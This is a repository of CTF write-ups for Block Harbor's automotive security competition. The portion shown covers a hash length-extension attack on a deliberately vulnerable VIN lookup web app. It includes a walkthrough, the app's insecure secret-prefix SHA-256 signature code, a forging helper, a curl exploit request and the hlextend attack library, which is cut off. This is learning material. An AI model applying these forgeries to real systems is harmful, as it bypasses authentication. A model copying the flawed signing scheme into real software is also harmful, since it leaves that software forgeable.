├── .gitattributes
├── README.md
├── crypto
    └── holy-hell
    │   ├── README.md
    │   ├── app.py
    │   ├── extend.py
    │   ├── get-flag.sh
    │   ├── hlextend.py
    │   ├── vin-lookup-invalid.png
    │   └── vin-lookup-valid.png
├── pwn
    └── web-server-woes
    │   ├── Pipfile
    │   ├── Pipfile.lock
    │   ├── README.md
    │   ├── a.out
    │   ├── a.out.gzf
    │   ├── decomp-vuln.png
    │   └── exploit.py
├── steganography
    └── sadcarnoises
    │   ├── README.md
    │   ├── cewl
    │   ├── cewl.patch
    │   ├── decode.py
    │   ├── password
    │   ├── sad.ext4
    │   ├── sad.luks
    │   ├── sadcarnoises.wav
    │   ├── spectrograph.png
    │   └── wordlist
├── user-space-diagnostics
    ├── Makefile
    ├── Pipfile
    ├── Pipfile.lock
    ├── README.md
    ├── Reversing.md
    ├── flash-firmware.png
    ├── image-defined-strings-search.png
    ├── image-defined-strings.png
    ├── image-prng-function.png
    ├── image-server-up-polling-string.png
    ├── image.bin
    ├── image.bin.gzf
    ├── scripts
    │   ├── backdoor.sh
    │   ├── common.py
    │   ├── download.py
    │   ├── flash.py
    │   ├── fuzzer.py
    │   ├── getmem.py
    │   ├── level1.py
    │   ├── level3.py
    │   ├── level5.py
    │   ├── rdbid.py
    │   ├── reset.py
    │   ├── rtctl.py
    │   ├── tprepl.py
    │   ├── unlock.py
    │   └── upload.py
    ├── security-access-lvl-3-key-check.png
    ├── security-access-lvl-5-key-check.png
    └── shell.c
└── vsec-harborbay
    ├── Pipfile
    ├── Pipfile.lock
    ├── README.md
    └── scripts
        ├── common.py
        ├── getdtc.py
        ├── getmem.py
        ├── getvin.py
        ├── reset.py
        ├── tester.py
        └── unlock.py


/.gitattributes:
--------------------------------------------------------------------------------
1 | *.wav  filter=lfs diff=lfs merge=lfs -text
2 | *.png  filter=lfs diff=lfs merge=lfs -text
3 | *.luks filter=lfs diff=lfs merge=lfs -text
4 | *.ext4 filter=lfs diff=lfs merge=lfs -text
5 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Block Harbor CTF Season 1 Writeups
 2 | 
 3 | This repository contains writeups for my favorite challenges from [Block
 4 | Harbor](https://blockharbor.io/)'s Season 1 CTF, along with the scripts I used to assist me in
 5 | solving various tasks.
 6 | 
 7 | ## Resources
 8 | 
 9 | Here is  a list of resources I found helpful when solving the challenges.
10 | 
11 | - [Block Harbor's Vehicle Security Engineering Cloud](https://vsec.blockharbor.io)
12 | - [Block Harbor's YouTube Channel](https://www.youtube.com/@blockharbor)
13 | - [Python can-isotp Documentation](https://can-isotp.readthedocs.io/en/latest/index.html)
14 | - [UDS Explained - A Simple Intro by CSS Electronics](https://www.csselectronics.com/pages/uds-protocol-tutorial-unified-diagnostic-services)
15 | - [UDS Protocol Tutorial by PiEmbSysTech](https://piembsystech.com/uds-protocol/)
16 | - [UDS Tutorials by EmbeTronicX](https://embetronicx.com/tutorials/automotive/uds-protocol/)
17 | - [Unified Diagnostic Services - ISO-14229 Cheat Sheet by Softing](https://automotive.softing.com/fileadmin/sof-files/pdf/de/ae/poster/UDS_Faltposter_softing2016.pdf)
18 | - [Wikipedia Article on Unified Diagnostic Services](https://en.wikipedia.org/wiki/Unified_Diagnostic_Services)
19 | 


--------------------------------------------------------------------------------
/crypto/holy-hell/README.md:
--------------------------------------------------------------------------------
  1 | # Holy Hell
  2 | 
  3 | In this challenge, we are asked to retrieve information on VIN `1337`, and are directed to a web
  4 | application, hosted at [celsius.blockharbor.io:5800](http://celsius.blockharbor.io:5800/), where we
  5 | can generate VIN numbers and look up vehicle information by VIN number.
  6 | 
  7 | > Can you retreive info about the following VIN: 1337. If so, let us know, we want to know about
  8 | > that vehicle!
  9 | 
 10 | ![VIN Lookup with Valid Signature](vin-lookup-valid.png)
 11 | 
 12 | Looking at the page source, we find the following JavaScript, embedded between `<script>` tags,
 13 | which enables the client to interact with the web application. We can see references to two API
 14 | endpoints, `/vin/register` and `/vin/info`, which are used to generate and look up VIN numbers,
 15 | respectively.
 16 | 
 17 | ```js
 18 | $(document).ready(function() {
 19 |     $('#vinForm').submit(function(event) {
 20 |         event.preventDefault();
 21 |         var vin = $('#vinInput').val();
 22 |         lookupVIN(vin);
 23 |     });
 24 | });
 25 | 
 26 | function lookupVIN(vin) {
 27 |     var url = '/vin/info?vin=' + encodeURIComponent(vin);
 28 |     $.ajax({
 29 |         url: url,
 30 |         type: 'GET',
 31 |         success: function(response) {
 32 |             $('#result').html(response);
 33 |         },
 34 |         error: function(xhr, status, error) {
 35 |             $('#result').html('Error: ' + error);
 36 |         }
 37 |     });
 38 | }
 39 | 
 40 | function registerVIN() {
 41 |     $.ajax({
 42 |         url: '/vin/register',
 43 |         type: 'GET',
 44 |         success: function(response) {
 45 |             var vinValue = response.split('=')[1];
 46 |             <!-- lol raw write to the dom -->
 47 |             $('#vinInput').val(vinValue);
 48 |             $('#result').html('');
 49 | 
 50 |             var cookieHeader = xhr.getResponseHeader('Set-Cookie');
 51 |             if (cookieHeader) {
 52 |                 var cookieParts = cookieHeader.split(';');
 53 |                 var cookie = cookieParts[0];
 54 |                 document.cookie = cookie;
 55 |             }
 56 |         },
 57 |         error: function(xhr, status, error) {
 58 |             $('#result').html('Error: ' + error);
 59 |         }
 60 |     });
 61 | }
 62 | ```
 63 | 
 64 | When clicking the _Generate_ button, we observe that an HTTP GET request is sent to `/vin/register`,
 65 | and, in the response, we receive the VIN number and a Cookie containing a signature for the given
 66 | VIN. Attempts to look up vehicle information with an incorrect signature for a particular VIN,
 67 | results in an error.
 68 | 
 69 | ![VIN Lookup with Invalid Signature](vin-lookup-invalid.png)
 70 | 
 71 | We can guess that the signatures might be generated in an insecure manner, which could allow us to
 72 | create a valid signature for our target VIN, but without having access to the source code, we'd be
 73 | flying blind. We can use [gobuster](https://www.kali.org/tools/gobuster/) or one of its many
 74 | alternatives to search for other directories and resources exposed by the web app.
 75 | 
 76 | ```
 77 | gobuster -u http://celsius.blockharbor.io:5800/ -w /usr/share/wordlists/dirb/wordlists/small.txt -t 1 --delay 200ms
 78 | ```
 79 | 
 80 | In the above command, we specify the `-t 1 --delay 200ms` options to make sure that we respect Block
 81 | Harbor's rate limit of 5 requests per second. Because I chose a fairly small wordlist (~950 lines),
 82 | the command shouldn't take too long to complete. Once it does, you'll see that it found a single
 83 | additional endpoint, `/app`, which appears to contain the source code for the web app. Let's
 84 | download the file from the server using `wget` and save it as a Python script.
 85 | 
 86 | ```
 87 | wget http://celsius.blockharbor.io:5800/app -O app.py
 88 | ```
 89 | 
 90 | Taking a look at the source code, we see that an insecure signature sheme is, indeed, being used.
 91 | The signature algorithm simply computes the SHA-256 digest of the input data, prefixed with a random
 92 | 128-bit key. MD5, SHA-1, and most of SHA-2 (including SHA-256) are susceptible to a [length
 93 | extension attack](https://en.wikipedia.org/wiki/Length_extension_attack) if used when constructing
 94 | message authentication codes (MACs). Given any signed input, this attack allows one to compute a
 95 | valid signature for the same input with some extra data appended to it. The fact that we don't know
 96 | the value of the secret data is irrelevant, since the server will prepend it to the input for us.
 97 | 
 98 | ```py
 99 | _SECURE_BYTES = urandom(16)
100 | 
101 | def calc_sig(data):
102 |     if type(data) != bytes:
103 |         data = data.encode()
104 |     md = sha256(_SECURE_BYTES + data)
105 |     return md.hexdigest()
106 | ```
107 | 
108 | In our case, here, the input that gets hashed by the server's signature algorithm is the value of
109 | the _entire_ query string that is sent in the HTTP GET request to `/vin/info`. So if we request
110 | `/vin/info?vin=1FMBU01BX2R8SEDBJ`, the server will compute the SHA-256 digest of
111 | `vin=1FMBU01BX2R8SEDBJ`, prefixed with the random key, and then check that it matches the signature
112 | we sent in the HTTP Cookie header. If the signatures match, we get the information on that VIN,
113 | otherwise, we get an error. Therefore, we want to compute the signature for the original query
114 | string, `vin=1FMBU01BX2R8SEDBJ`, extended with `&vin=1337`, so that the web app, when converting the
115 | query string to a dictionary, will overwrite the first VIN with the second one.
116 | 
117 | ```py
118 | def to_dct(data):
119 |     _dct = {}
120 |     try:
121 |         data = data.split(b'&')
122 |         for line in data:
123 |             k,v = line.split(b'=')
124 |             _dct[k] = v
125 |     except Exception as e:
126 |         pass
127 |     return _dct
128 | ```
129 | 
130 | It's important to keep in mind that SHA-256 hashes data in 64-byte blocks, meaning that the input
131 | will have to be padded to a multiple of 64 bytes before being processed. The padding scheme it uses
132 | is not that complicated, but to avoid going into too much detail I'll just refer you to _Section
133 | 5.1 Padding the Message_ of [FIPS
134 | 180-4](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.180-4.pdf), where you can read all about it.
135 | 
136 | To perform the length extension attack, we need to be able to manually set the internal state of the
137 | SHA-256 hash function. Python's `hashlib` module, however, does not give the user such access. To
138 | save ourselves the hassle of having to reinvent the wheel, we can use the 3rd party
139 | [hlextend](https://github.com/stephenbradshaw/hlextend) module, which already implements the attack
140 | for us. It's not available on PyPi as of writing this, but it has no external dependencies, so
141 | using it is as simple as downloading the single-file Python module from the project's GitHub repo.
142 | 
143 | With the [helper script](extend.py) I wrote, we can enter a known signature, its corresponding VIN,
144 | and our target VIN, and we will get a new query string along with its computed signature. All that's
145 | left to do to get the flag is set the signature cookie to the new value and send the query string in
146 | an HTTP GET request to the `/vin/info` endpoint.
147 | 
148 | ```
149 | $ python3 extend.py 518151fdc2b3d5a8beae3ddf0a4b0f4e5c32fdbc967bfc8963a7133ffc143470 1GTHC83G64B2F5VU8 1337
150 | 
151 | New Query = vin=1GTHC83G64B2F5VU8%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%28%26vin=1337
152 | Signature = cac53476985c5d01a17feded0be21b923f057a36260dada19493aa4b70b68a1f
153 | ```
154 | 
155 | **Flag:** `bh{h4sh_ba$h_m1s_ma7ch}`
156 | 


--------------------------------------------------------------------------------
/crypto/holy-hell/app.py:
--------------------------------------------------------------------------------
 1 | #!/usr/local/bin/python3
 2 | from hashlib import sha256
 3 | from urllib.parse import urlparse
 4 | from os import urandom
 5 | from time import time
 6 | from urllib.parse import unquote_to_bytes, quote
 7 | from binascii import hexlify, unhexlify
 8 | from flask import Flask, render_template, request, make_response
 9 | from vinGen import getRandomVin
10 | from vindecoder import VINDecoder, InvalidVINException
11 | 
12 | _SECURE_BYTES = urandom(16)
13 | 
14 | with open("./flag.txt",'r') as fd:
15 |     flag = fd.read().strip()
16 | 
17 | _vins = {b'1337':
18 |     {'region': 'North America', 'country': 'United States', 'manufacturer': 'blockharbor', 'model': flag, 'check': True, 'year': 1337, 'assembly plant': '', 'serial': ''}
19 | }
20 | 
21 | def lookup_vin(vin):
22 |     return str(_vins[vin])
23 | 
24 | def calc_sig(data):
25 |     if type(data) != bytes:
26 |         data = data.encode()
27 |     md = sha256(_SECURE_BYTES + data)
28 |     return md.hexdigest()
29 | 
30 | def to_dct(data):
31 |     _dct = {}
32 |     try:
33 |         data = data.split(b'&')
34 |         for line in data:
35 |             k,v = line.split(b'=')
36 |             _dct[k] = v
37 |     except Exception as e:
38 |         pass
39 |     return _dct
40 | 
41 | app = Flask(__name__)
42 | 
43 | @app.route('/')
44 | def home():
45 |     with open('frontend.html','r') as fd:
46 |         return fd.read()
47 | 
48 | # super realistic application source leak
49 | @app.route('/app')
50 | def leak_app():
51 |     with open("./run",'r') as fd:
52 |         return fd.read()
53 | 
54 | @app.route('/vin/info',methods=['GET'])
55 | def get_vin_info():
56 | 
57 |     query_string = request.query_string
58 |     query_string = unquote_to_bytes(query_string)
59 |     _set_sig     = request.cookies.get('signature')
60 |     query_sig    = calc_sig(query_string)
61 | 
62 |     if query_sig != _set_sig:
63 |         return "Invalid signature..."
64 | 
65 |     query_dict = to_dct(query_string)
66 |     data = lookup_vin(query_dict[b'vin'])
67 | 
68 |     return data
69 |         
70 | @app.route('/vin/register',methods=['GET'])
71 | def reg_vin():
72 |     #Classic
73 |     while True:
74 |         try:
75 |             vin = getRandomVin()
76 |             decoder = VINDecoder()
77 |             vin_data = decoder.decode(vin)
78 |             break
79 |         except KeyError:
80 |             continue
81 |     _vins[vin.encode()] = vin_data
82 |     vin = 'vin=' + vin
83 |     vin_sig = calc_sig(vin)
84 |     response = make_response(vin)
85 |     response.set_cookie('signature', vin_sig)
86 |     return response
87 | 
88 | if __name__ == '__main__':
89 |     app.run(host='0.0.0.0')
90 | 


--------------------------------------------------------------------------------
/crypto/holy-hell/extend.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | from urllib.parse import quote
 4 | import hlextend
 5 | import sys
 6 | 
 7 | if len(sys.argv) != 4:
 8 |     print('Usage: python extend.py old-sig old-vin new-vin')
 9 | else:
10 |     old_sig = sys.argv[1]
11 |     old_vin =  b'vin=' + sys.argv[2].encode()
12 |     new_vin = b'&vin=' + sys.argv[3].encode()
13 |     sha256 = hlextend.new('sha256')
14 |     new_query = sha256.extend(new_vin, old_vin, 16, old_sig)
15 |     print('New Query =', quote(new_query, safe='/='))
16 |     print('Signature =', sha256.hexdigest())
17 | 


--------------------------------------------------------------------------------
/crypto/holy-hell/get-flag.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | 
3 | curl -s -H 'Cookie: signature=cac53476985c5d01a17feded0be21b923f057a36260dada19493aa4b70b68a1f' \
4 |     http://celsius.blockharbor.io:5800/vin/info\?vin\=1GTHC83G64B2F5VU8%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%28%26vin\=1337 \
5 |         | grep -oE 'bh{[^}]+}'
6 | 


--------------------------------------------------------------------------------
/crypto/holy-hell/hlextend.py:
--------------------------------------------------------------------------------
  1 | # Copyright (C) 2014 by Stephen Bradshaw
  2 | #
  3 | # SHA1 and SHA2 generation routines from SlowSha https://code.google.com/p/slowsha/
  4 | # which is: Copyright (C) 2011 by Stefano Palazzo
  5 | #
  6 | # Permission is hereby granted, free of charge, to any person obtaining a copy
  7 | # of this software and associated documentation files (the "Software"), to deal
  8 | # in the Software without restriction, including without limitation the rights
  9 | # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 10 | # copies of the Software, and to permit persons to whom the Software is
 11 | # furnished to do so, subject to the following conditions:
 12 | #
 13 | # The above copyright notice and this permission notice shall be included in
 14 | # all copies or substantial portions of the Software.
 15 | #
 16 | # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 17 | # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 18 | # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 19 | # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 20 | # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 21 | # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 22 | # THE SOFTWARE.
 23 | 
 24 | '''
 25 |     Pure Python Hash Length Extension module.
 26 | 
 27 |     Currently supports SHA1, SHA256 and SHA512, more algorithms will
 28 |     be added in the future.
 29 | 
 30 | 
 31 |     Create a hash by calling one of the named constuctor functions:
 32 |     sha1(), sha256(), and sha512(), or by calling new(algorithm).
 33 | 
 34 |     The hash objects have the following methods:
 35 | 
 36 |     hash(message):      
 37 | 
 38 |         Feeds data into the hash function using the normal interface.
 39 | 
 40 |     extend(appendData, knownData, secretLength, startHash):
 41 | 
 42 |         Performs a hash length extension attack.  Returns the bytestring to
 43 |         use when appending data.
 44 | 
 45 |     hexdigest():        
 46 | 
 47 |         Returns a hexlified version of the hash output.
 48 | 
 49 | 
 50 |     Assume you have a hash generated from an unknown secret value concatenated with
 51 |     a known value, and you want to be able to produce a valid hash after appending 
 52 |     additional data to the known value.
 53 | 
 54 |     If the hash algorithm used is one of the vulnerable functions implemented in
 55 |     this module, is is possible to achieve this without knowing the secret value
 56 |     as long as you know (or can guess, perhaps by brute force) the length of that
 57 |     secret value.  This is called a hash length extension attack. 
 58 | 
 59 |     Given an existing sha1 hash value '52e98441017043eee154a6d1af98c5e0efab055c',
 60 |     known data of 'hello', an unknown secret of length 10 and data you wish
 61 |     to append of 'file', you would do the following to perform the attack:
 62 |     
 63 |     >>> import hlextend
 64 |     >>> sha = hlextend.new('sha1')
 65 |     >>> print sha.extend(b'file', b'hello', 10, '52e98441017043eee154a6d1af98c5e0efab055c')
 66 |     b'hello\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xfile'
 67 |     >>> print sha.hexdigest()
 68 |     c60fa7de0860d4048a3bfb36b70299a95e6587c9
 69 | 
 70 |    The unknown secret (of length 10), that when hashed appended with 'hello' produces
 71 |    a SHA1 hash of '52e98441017043eee154a6d1af98c5e0efab055c', will then produce 
 72 |    a SHA1 hash of 'c60fa7de0860d4048a3bfb36b70299a95e6587c9' when appended with the output 
 73 |    from the extend function above.
 74 |    
 75 |    If you are not sure of the exact length of the secret value, simply try the above
 76 |    multiple times specifying different values for the length to brute force.
 77 | '''
 78 | 
 79 | 
 80 | from re import match
 81 | from math import ceil
 82 | from typing import Union
 83 | 
 84 | 
 85 | __version__ = "0.2"
 86 | 
 87 | 
 88 | class Hash(object):
 89 |     '''Parent class for hash functions'''
 90 | 
 91 |     def hash(self, message):
 92 |         '''Normal input for data into hash function'''
 93 | 
 94 |         length = bin(len(message) * 8)[2:].rjust(self._blockSize, "0")
 95 | 
 96 |         while len(message) > self._blockSize:
 97 |             self._transform(''.join([bin(a)[2:].rjust(8, "0")
 98 |                             for a in message[:self._blockSize]]))
 99 |             message = message[self._blockSize:]
100 | 
101 |         message = self.__hashBinaryPad(message, length)
102 | 
103 |         for a in range(len(message) // self._b2):
104 |             self._transform(message[a * self._b2:a * self._b2 + self._b2])
105 | 
106 |     def extend(self, appendData, knownData, secretLength, startHash):
107 |         '''Hash length extension input for data into hash function'''
108 |         self.__checkInput(secretLength, startHash)
109 |         self.__setStartingHash(startHash)
110 | 
111 |         extendLength = self.__hashGetExtendLength(
112 |             secretLength, knownData, appendData)
113 | 
114 |         message = appendData
115 | 
116 |         while len(message) > self._blockSize:
117 |             self._transform(''.join([bin(a)[2:].rjust(8, "0")
118 |                             for a in message[:self._blockSize]]))
119 |             message = message[self._blockSize:]
120 | 
121 |         message = self.__hashBinaryPad(message, extendLength)
122 | 
123 |         for i in range(len(message) // self._b2):
124 |             self._transform(message[i * self._b2:i * self._b2 + self._b2])
125 | 
126 |         return self.__hashGetPadData(secretLength, knownData, appendData)
127 | 
128 |     def hexdigest(self):
129 |         '''Outputs hash data in hexlified format'''
130 |         return ''.join([(('%0' + str(self._b1) + 'x') % (a)) for a in self.__digest()])
131 | 
132 |     def __init__(self):
133 |         # pre calculate some values that get used a lot
134 |         self._b1 = self._blockSize/8
135 |         self._b2 = self._blockSize*8
136 | 
137 |     def __digest(self):
138 |         return [self.__getattribute__(a) for a in dir(self) if match('^_h\d+$', a)]
139 | 
140 |     def __setStartingHash(self, startHash):
141 |         c = 0
142 |         hashVals = [int(startHash[a:a+int(self._b1)], base=16)
143 |                     for a in range(0, len(startHash), int(self._b1))]
144 |         for hv in [a for a in dir(self) if match('^_h\d+$', a)]:
145 |             self.__setattr__(hv, hashVals[c])
146 |             c += 1
147 | 
148 |     def __checkInput(self, secretLength, startHash):
149 |         if not isinstance(secretLength, int):
150 |             raise TypeError('secretLength must be a valid integer')
151 |         if secretLength < 1:
152 |             raise ValueError('secretLength must be grater than 0')
153 |         if not match('^[a-fA-F0-9]{' + str(len(self.hexdigest())) + '}$', startHash):
154 |             raise ValueError('startHash must be a string of length ' +
155 |                              str(len(self.hexdigest())) + ' in hexlified format')
156 | 
157 |     def __byter(self, byteVal):
158 |         '''Helper function to return usable values for hash extension append data'''
159 |         if byteVal < 0x20 or byteVal > 0x7e:
160 |             return '\\x%02x' % (byteVal)
161 |         else:
162 |             return chr(byteVal)
163 | 
164 |     def __binToByte(self, binary) -> bytearray:
165 |         return int(binary, 2).to_bytes(len(binary) // 8, byteorder='big')
166 | 
167 |     def __hashGetExtendLength(self, secretLength, knownData, appendData):
168 |         '''Length function for hash length extension attacks'''
169 |         # binary length (secretLength + len(knownData) + size of binarysize+1) rounded to a multiple of blockSize + length of appended data
170 |         originalHashLength = int(ceil(
171 |             (secretLength+len(knownData)+self._b1+1)/float(self._blockSize)) * self._blockSize)
172 |         newHashLength = originalHashLength + len(appendData)
173 |         return bin(newHashLength * 8)[2:].rjust(self._blockSize, "0")
174 | 
175 |     def __hashGetPadData(self, secretLength, knownData, appendData):
176 |         '''Return append value for hash extension attack'''
177 |         originalHashLength = bin(
178 |             (secretLength+len(knownData)) * 8)[2:].rjust(self._blockSize, "0")
179 |         padData = ''.join(bin(i)[2:].rjust(8, "0")
180 |                           for i in knownData) + "1"
181 |         padData += "0" * (((self._blockSize*7) - (len(padData)+(secretLength*8)) %
182 |                           self._b2) % self._b2) + originalHashLength
183 |         
184 |         return self.__binToByte(padData) + appendData
185 | 
186 |     def __hashBinaryPad(self, message, length):
187 |         '''Pads the final blockSize block with \x80, zeros, and the length, converts to binary'''
188 |         out_msg = ''
189 |         
190 |         for i in message:
191 |             out_msg += bin(i)[2:].rjust(8, "0")
192 |         
193 |         out_msg += "1"
194 |         out_msg += "0" * (((self._blockSize*7) - len(out_msg) % self._b2) % self._b2) + length
195 |         
196 |         return out_msg
197 | 
198 | 
199 | class SHA1 (Hash):
200 | 
201 |     _h0, _h1, _h2, _h3, _h4, = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476, 0xc3d2e1f0
202 |     _blockSize = 64
203 | 
204 |     def _transform(self, chunk):
205 | 
206 |         def lrot(x, n): return (x << n) | (x >> (32 - n))
207 |         w = []
208 | 
209 |         for j in range(len(chunk) // 32):
210 |             w.append(int(chunk[j * 32:j * 32 + 32], 2))
211 | 
212 |         for i in range(16, 80):
213 |             w.append(lrot(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1)
214 |                      & 0xffffffff)
215 | 
216 |         a = self._h0
217 |         b = self._h1
218 |         c = self._h2
219 |         d = self._h3
220 |         e = self._h4
221 | 
222 |         for i in range(80):
223 | 
224 |             if i <= i <= 19:
225 |                 f, k = d ^ (b & (c ^ d)), 0x5a827999
226 |             elif 20 <= i <= 39:
227 |                 f, k = b ^ c ^ d, 0x6ed9eba1
228 |             elif 40 <= i <= 59:
229 |                 f, k = (b & c) | (d & (b | c)), 0x8f1bbcdc
230 |             elif 60 <= i <= 79:
231 |                 f, k = b ^ c ^ d, 0xca62c1d6
232 | 
233 |             temp = lrot(a, 5) + f + e + k + w[i] & 0xffffffff
234 |             a, b, c, d, e = temp, a, lrot(b, 30), c, d
235 | 
236 |         self._h0 = (self._h0 + a) & 0xffffffff
237 |         self._h1 = (self._h1 + b) & 0xffffffff
238 |         self._h2 = (self._h2 + c) & 0xffffffff
239 |         self._h3 = (self._h3 + d) & 0xffffffff
240 |         self._h4 = (self._h4 + e) & 0xffffffff
241 | 
242 | 
243 | class SHA256 (Hash):
244 | 
245 |     _h0, _h1, _h2, _h3, _h4, _h5, _h6, _h7 = (
246 |         0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a,
247 |         0x510e527f, 0x9b05688c, 0x1f83d9ab, 0x5be0cd19)
248 | 
249 |     _blockSize = 64
250 | 
251 |     def _transform(self, chunk):
252 |         def rrot(x, n): return (x >> n) | (x << (32 - n))
253 |         w = []
254 | 
255 |         k = [
256 |             0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5,
257 |             0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
258 |             0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3,
259 |             0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
260 |             0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc,
261 |             0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
262 |             0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7,
263 |             0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
264 |             0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13,
265 |             0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
266 |             0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3,
267 |             0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
268 |             0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5,
269 |             0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
270 |             0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208,
271 |             0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2]
272 | 
273 |         for j in range(len(chunk) // 32):
274 |             w.append(int(chunk[j * 32:j * 32 + 32], 2))
275 | 
276 |         for i in range(16, 64):
277 |             s0 = rrot(w[i - 15], 7) ^ rrot(w[i - 15], 18) ^ (w[i - 15] >> 3)
278 |             s1 = rrot(w[i - 2], 17) ^ rrot(w[i - 2], 19) ^ (w[i - 2] >> 10)
279 |             w.append((w[i - 16] + s0 + w[i - 7] + s1) & 0xffffffff)
280 | 
281 |         a = self._h0
282 |         b = self._h1
283 |         c = self._h2
284 |         d = self._h3
285 |         e = self._h4
286 |         f = self._h5
287 |         g = self._h6
288 |         h = self._h7
289 | 
290 |         for i in range(64):
291 |             s0 = rrot(a, 2) ^ rrot(a, 13) ^ rrot(a, 22)
292 |             maj = (a & b) ^ (a & c) ^ (b & c)
293 |             t2 = s0 + maj
294 |             s1 = rrot(e, 6) ^ rrot(e, 11) ^ rrot(e, 25)
295 |             ch = (e & f) ^ ((~ e) & g)
296 |             t1 = h + s1 + ch + k[i] + w[i]
297 | 
298 |             h = g
299 |             g = f
300 |             f = e
301 |             e = (d + t1) & 0xffffffff
302 |             d = c
303 |             c = b
304 |             b = a
305 |             a = (t1 + t2) & 0xffffffff
306 | 
307 |         self._h0 = (self._h0 + a) & 0xffffffff
308 |         self._h1 = (self._h1 + b) & 0xffffffff
309 |         self._h2 = (self._h2 + c) & 0xffffffff
310 |         self._h3 = (self._h3 + d) & 0xffffffff
311 |         self._h4 = (self._h4 + e) & 0xffffffff
312 |         self._h5 = (self._h5 + f) & 0xffffffff
313 |         self._h6 = (self._h6 + g) & 0xffffffff
314 |         self._h7 = (self._h7 + h) & 0xffffffff
315 | 
316 | 
317 | class SHA512 (Hash):
318 | 
319 |     _h0, _h1, _h2, _h3, _h4, _h5, _h6, _h7 = (
320 |         0x6a09e667f3bcc908, 0xbb67ae8584caa73b, 0x3c6ef372fe94f82b,
321 |         0xa54ff53a5f1d36f1, 0x510e527fade682d1, 0x9b05688c2b3e6c1f,
322 |         0x1f83d9abfb41bd6b, 0x5be0cd19137e2179)
323 | 
324 |     _blockSize = 128
325 | 
326 |     def _transform(self, chunk):
327 | 
328 |         def rrot(x, n): return (x >> n) | (x << (64 - n))
329 |         w = []
330 | 
331 |         k = [
332 |             0x428a2f98d728ae22, 0x7137449123ef65cd,
333 |             0xb5c0fbcfec4d3b2f, 0xe9b5dba58189dbbc,
334 |             0x3956c25bf348b538, 0x59f111f1b605d019,
335 |             0x923f82a4af194f9b, 0xab1c5ed5da6d8118,
336 |             0xd807aa98a3030242, 0x12835b0145706fbe,
337 |             0x243185be4ee4b28c, 0x550c7dc3d5ffb4e2,
338 |             0x72be5d74f27b896f, 0x80deb1fe3b1696b1,
339 |             0x9bdc06a725c71235, 0xc19bf174cf692694,
340 |             0xe49b69c19ef14ad2, 0xefbe4786384f25e3,
341 |             0x0fc19dc68b8cd5b5, 0x240ca1cc77ac9c65,
342 |             0x2de92c6f592b0275, 0x4a7484aa6ea6e483,
343 |             0x5cb0a9dcbd41fbd4, 0x76f988da831153b5,
344 |             0x983e5152ee66dfab, 0xa831c66d2db43210,
345 |             0xb00327c898fb213f, 0xbf597fc7beef0ee4,
346 |             0xc6e00bf33da88fc2, 0xd5a79147930aa725,
347 |             0x06ca6351e003826f, 0x142929670a0e6e70,
348 |             0x27b70a8546d22ffc, 0x2e1b21385c26c926,
349 |             0x4d2c6dfc5ac42aed, 0x53380d139d95b3df,
350 |             0x650a73548baf63de, 0x766a0abb3c77b2a8,
351 |             0x81c2c92e47edaee6, 0x92722c851482353b,
352 |             0xa2bfe8a14cf10364, 0xa81a664bbc423001,
353 |             0xc24b8b70d0f89791, 0xc76c51a30654be30,
354 |             0xd192e819d6ef5218, 0xd69906245565a910,
355 |             0xf40e35855771202a, 0x106aa07032bbd1b8,
356 |             0x19a4c116b8d2d0c8, 0x1e376c085141ab53,
357 |             0x2748774cdf8eeb99, 0x34b0bcb5e19b48a8,
358 |             0x391c0cb3c5c95a63, 0x4ed8aa4ae3418acb,
359 |             0x5b9cca4f7763e373, 0x682e6ff3d6b2b8a3,
360 |             0x748f82ee5defb2fc, 0x78a5636f43172f60,
361 |             0x84c87814a1f0ab72, 0x8cc702081a6439ec,
362 |             0x90befffa23631e28, 0xa4506cebde82bde9,
363 |             0xbef9a3f7b2c67915, 0xc67178f2e372532b,
364 |             0xca273eceea26619c, 0xd186b8c721c0c207,
365 |             0xeada7dd6cde0eb1e, 0xf57d4f7fee6ed178,
366 |             0x06f067aa72176fba, 0x0a637dc5a2c898a6,
